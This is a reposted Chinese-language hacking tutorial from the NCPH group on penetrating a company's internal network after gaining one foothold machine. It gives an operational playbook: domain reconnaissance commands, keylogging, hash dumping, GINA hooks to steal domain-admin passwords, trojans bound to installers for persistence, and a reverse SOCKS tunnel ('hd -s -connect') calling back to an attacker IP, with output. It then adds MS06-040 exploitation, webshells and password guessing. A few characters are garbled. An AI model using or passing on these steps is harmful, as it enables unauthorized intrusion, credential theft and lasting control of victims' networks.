作者：凋凌玫瑰
來源：NCPH

內網，很多人應該形成了這個概念，很多大型網絡的外部網站或是服務器不一定有用，當然外網也是一個突破口。很多時候我們直接從外網入手，隨著安 全的不斷加固，已變得越來越困難。那么黑客通常是怎么進行內網滲透的，內網滲透又是怎樣與社會工程學聯系起來呢，今天主要描述黑客內網滲透的常用操作手 法，關于如何獲得內網機器，請查找我以前的一篇文章《內網滲透—如何打開突破口》。

滲透的過程就是一個信息刺探、利用、思考、突破的過程。首先在我們獲得一臺內網的機器后應該怎么做，當然是信息刺探。

一．信息刺探
1． 當 前機器的人物身份，當前控制的這臺機器人物是一個什么樣的身份，客服、銷售人員還是開發人員，還是管理員?？头鲂┦裁?#xff0c;會通過什么方式跟其它人聯系； 開發人員在開發什么，應該會跟管理員聯系，也會有一定的外網管理權限和內網測試服務器，這種情況下內網測試服務器是可以搞定的。如果是客服機器或是銷售人 員機器呢，他一定有整個公司或是網絡的聯系方式，自己發揮想象去。是管理員機器的話就不用說。
2． 當前網絡結構的分析，是域結構，還是劃分vlan的結構，大多數大型網絡是域結構。一般外網的服務器都是有硬件防火墻的，并且指定內網的某些機器的mac才可以連接。所以我們先看看內網情況：
C:\WINNT\system32>net view
伺服器名稱 說明

——————————————————————————-
\\2007ACC
\\ABS-XP
\\ACER-TS250 NAS 4BAY SATA
\\ACER-TS500 NAS 4BAY SATA
\\ACER6100
\\AKIRA-WU akira-wu
\\ALICECHEN
\\AMYCHIU
\\ANDY2007
\\ANDYTEST01
\\ANNHUANG
\\ANNIEKUO
\\APOLLO
\\APOPO
\\ARTSERVER
\\AUGTCHIEN
\\AVSERVER
\\BENLEE01
\\BENSON-NB
…
先用net view查看內網的情況,列出的機器就是在網絡結構中有聯系的機器，但不一定都在一個網段，所以ping出這些機器的ip，以便分析大概有哪些網段.
3.了解本機在網絡中所占的角色
先ipconfig /all看下是否在域中，如圖：

從上圖，我們可以得知，存在一個域xxxx，從內網ip來看，應該還存在很多個段，內網很大。我們ping 一下域xxxx，得到域服務器的ip.
我們再來看一下本機在域里面的角色,如圖:

看來只是一個普通域用戶.我們再來查看一下域里面的用戶.如圖：

…
域里面的用戶很多，那么我們再查看一下域管理員有哪些：

從上面我們掌握了內網的大概信息。下面我們進一步利用這些信息。
二.信息的利用：
1． 首 先是內網占據的這臺機器，要做幾個必要的措施：1）種鍵盤記錄，記錄其可能登錄的密碼，有用的。2)抓hash跑密碼，主要查看密碼規則是否有規律，它的 密碼也可以去試下其它機器的密碼，看是否通用。3）種gina，這一步主要不是記錄當前用戶的密碼，而是為了來記錄域管理員的登錄密碼，因為域管理員是有 權限登錄下面每臺用戶的機器的，gina是可以記到的，記到域管理密碼后，內網在域中的機器就可以全部控制了。4）給占據機器上的備用安裝文件或是備用驅 動上綁馬，此是為了防止對方重裝機器，馬就掉了。
2． 反彈socks代理。
在內網滲透中，反彈socks代理是很必要的，大家都知道用lcx來轉發端口，好像很少看到有人是直接反彈代理來連接。因為我們要連接內網的其 它機器，我們不可能一個一個的去中轉端口連接，在當前控制的機器上開代理也沒辦法，因為對方在內網。所以我們就用反彈代理的方式。這種方式其實大家都明 白。

首先在本機監聽：
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ……
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ……
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ……
此命令是將連接進來的53端口的數據包連接到1180端口。

在對方機器上運行:

C:\RECYCLER>hd -s -connect x.x.x.x 53
[+] MainSocket Connect to x.x.x.x:53 Success!
[+] Send Main Command ok!
[+] Recv Main Command ok!
[+] Send Main Command again ok!
上面的x.x.x.x為你的外網ip，下面為你接收到反彈回來的代理顯示的情況。
c:\>hd -s -listen 53 1180
[+] Listening ConnectBack Port 53 ……
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ……
[+] Listen2 OK!
[+] Waiting for MainSocket on port:53 ……
[+] Recv Main Command Echo ok!
[+] Send Main Command Echo ok!
[+] Recv Main Command Echo again ok!
[+] Get a MainSocket on port 53 from x.x.x.x ……
[+] Waiting Client on Socks5 Agent Port:1180….

上面ok了，接下來在你本機安裝sockscap，照下圖設置就ok了。

Sockscap設置在控制臺的”文件”-“設置”里，控制臺可以將你需要代理的程序放在上面，直接拖進去即可，控制臺機的程序就可以進接連接 內網的機器了。如直接用mstsc連接內網其它機器的3389,就可以上去試密碼或是登錄管理，也可以用mssql連接內網的1433，嘗試sa弱口令 等?？傊磸梥ocks是你利用已控制的內網機器通向內網其它機器的一道橋梁。

三．思考：
信息有了，通道有了，接下來我們怎么做？
1． 內網溢出,通過對內網的掃描情況，判斷win2000的機器，利用ms06040進行運程溢出。
2． 內網web，通過內網的掃描，用sockscap上的ie來打開內網開放的web，在內網采用web注入或上傳的方式來獲取webshell提權。
3． 內網弱口令試探，利用ipc,或是3389，和已掌握的密碼信息來嘗試猜解內網nt的密碼，當然這需要耐心，也是非常有用的。

4． 猜解sql弱口令，在sockscap控制臺中用sql連接器連接內網開放1433或是3306的機器，猜解弱口令。
5． 內網嗅探，不得已的辦法，不推薦。
6． 內網主動會話劫持，篇幅長，難度高，下次詳寫。
四．突破：
突破是考驗經驗和思維的時候，利用已掌握的信息去突破面臨的困難。如，如何拿到第一臺內網服務器站穩腳；如何拿到內網到外網授權的機器；如何拿到外網密碼。
在內網中站穩腳后，迅速判斷管理員機器，控制管理員的機器極為重要。一般從機器名可以看出管理員機器，管理員的機器名常為：andy 、admin 、peter、 kater，在域控的環境中，我們只要得到域控密碼就可以直接用ipc連接管理員機器種馬。不是域控的環境中，我們也可以在內網測試服務器中跑出服務器的 密碼進而拿去嘗試管理員的密碼。
在突破過程中，內網的數據庫和web的分析很重要，數據庫里面有很多有用的信息，web的數據庫連接及作用也有助于進一步的分析。總之在這一過程中只有靈活運用，發散思維才可以進一步的突破和控制。

黑客與安全是一個矛盾話題，只有知已知彼才能更好地維護內網安全。以上是黑客常用的內網滲透手法，知識有限，文筆粗拙，高手笑過，此文僅供新手科普。
By rose of ncph

轉載于:https://www.cnblogs.com/QianshaoStudio/p/5464070.html

總結

以上是生活随笔為你收集整理的内网渗透常用手法的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。